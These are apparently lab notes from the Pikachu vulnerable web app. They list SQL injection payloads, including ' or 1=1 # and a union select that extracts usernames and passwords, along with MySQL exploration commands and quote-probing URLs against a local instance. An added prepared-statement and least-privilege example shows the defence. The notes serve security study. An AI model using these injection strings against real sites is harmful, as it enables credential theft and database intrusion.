Queries entered in the Pikachu lab
xx' or 1=1 #
' or 1=1 #
' union select username,password from users#
Open cmd in the MySQL bin directory, enter the command below, then enter the database password
mysql -u root -p
Run the commands
show databases;
use pikachu
show tables;
desc member;
select id,username,email from member;
select id,email from member where username ='xx' or 1=1;
select id,username,email from member limit 2,2;
show tables;
select * from users;
select id,email from member union select username,password from users;
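The member lookup from the session above, handled defensively, as an added example that is not part of the original notes: the input is bound through a MySQL prepared statement instead of being concatenated into the query text, and a restricted account limits what the application can read. The statement name find_member, the account name pikachu_ro and its password are assumptions made for illustration.

```sql
-- Added example for the mysql client, using the pikachu schema from the notes.
-- Assumed names: find_member, pikachu_ro, and the placeholder password.

use pikachu;

-- 1. Bind the input as a parameter instead of building the statement from it.
PREPARE find_member FROM
  'select id,email from member where username = ?';

-- First payload from the notes, stored as plain data.
-- (The inner quote is doubled only to write the string literal here.)
SET @name = 'xx'' or 1=1 #';
EXECUTE find_member USING @name;  -- whole string is compared with username

-- The union payload is treated the same way: it is a value, not SQL text.
SET @name = ''' union select username,password from users#';
EXECUTE find_member USING @name;

-- A normal lookup keeps working through the same statement.
SET @name = 'vince';
EXECUTE find_member USING @name;

DEALLOCATE PREPARE find_member;

-- 2. Least privilege: an application account that can read only the member
-- columns used by the lookup and has no privilege on the users table, so the
-- union against users is refused even where a concatenated query remains.
CREATE USER 'pikachu_ro'@'localhost' IDENTIFIED BY 'CHANGE_ME_placeholder';
GRANT SELECT (id, username, email)
  ON pikachu.member TO 'pikachu_ro'@'localhost';

-- Review what the account is allowed to do.
SHOW GRANTS FOR 'pikachu_ro'@'localhost';
```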
Single-quote query
http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=vince%27&submit=%E6%9F%A5%E8%AF%A2
Double-quote query
http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=vince%22&submit=%E6%9F%A5%E8%AF%A2